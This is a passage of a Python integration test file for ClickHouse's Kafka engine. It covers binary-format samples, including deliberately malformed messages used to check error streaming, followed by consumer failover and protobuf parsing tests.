\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Type of \'blockNo\' must be UInt16, not String"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug('Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = ast.literal_eval(instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name)))
errors_expected = ast.literal_eval(format_opts['expected'])
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result['raw_message'] == errors_expected['raw_message'], 'Proper raw_message for format: {}'.format(format_name)
# Errors text can change, just checking prefixes
assert errors_expected['error'] in errors_result['error'], 'Proper error for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "kafka_consumer_failover"
kafka_create_topic(admin_client, topic_name, num_partitions=2)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_predefined_configuration(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = 'conf'
kafka_create_topic(admin_client, topic_name)
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, topic_name, messages)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64, value UInt64) ENGINE = Kafka(kafka1, kafka_format='CSV');
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
# https://github.com/ClickHouse/ClickHouse/issues/26643
def test_issue26643(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
topic_list = []
topic_list.append(NewTopic(name="test_issue26643", num_partitions=4, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
msg = message_with_repeated_pb2.Message(
tnow=1629000000,
server='server1',
clien='host1',
sPort=443,
cPort=50000,
r=[
message_with_repeated_pb2.dd(name='1', type=444, ttl=123123, data=b'adsfasd'),
message_with_repeated_pb2.dd(name='2')
],
method='GET'
)
data = b''
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
msg = message_with_repeated_pb2.Message(
tnow=1629000002
)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
data = _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
producer.flush()
instance.query('''
CREATE TABLE IF NOT EXISTS test.test_queue
(
`tnow` UInt32,
`server` String,
`client` String,
`sPort` UInt16,
`cPort` UInt16,
`r.name` Array(String),
`r.class` Array(UInt16),
`r.type` Array(UInt16),
`r.ttl` Array(UInt32),
`r.data` Array(String),
`method` String
)
ENGINE = Kafka
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_issue26643',
kafka_group_name = 'test_issue26643_group',
kafka_format = 'Protobuf',
kafka_schema = 'message_with_repeated.proto:Message',
kafka_num_consumers = 4,
kafka_skip_broken_messages = 10000;
SET allow_suspicious_low_cardinality_types=1;
CREATE TABLE test.log
(
`tnow` DateTime('Asia/Istanbul') CODEC(DoubleDelta, LZ4),
`server` LowCardinality(String),
`client` LowCardinality(String),
`sPort` LowCardinality(UInt16),
`cPort` UInt16 CODEC(T64, LZ4),
`r.name` Array(String),
`r.class` Array(LowCardinality(UInt16)),
`r.type` Array(LowCardinality(UInt16)),
`r.ttl` Array(LowCardinality(UInt32)),
`r.data` Array(String),
`method` LowCardinality(String)
)
ENGINE = MergeTree
PARTITION BY toYYYYMMDD(tnow)
ORDER BY (tnow, server)
TTL toDate(tnow) + toIntervalMonth(1000)
SETTINGS index_granularity = 16384, merge_with_ttl_timeout = 7200;
CREATE MATERIALIZED VIEW test.test_consumer TO test.log AS
SELECT
toDateTime(a.tnow) AS tnow,
a.server AS server,
a.client AS client,
a.sPort AS sPort,
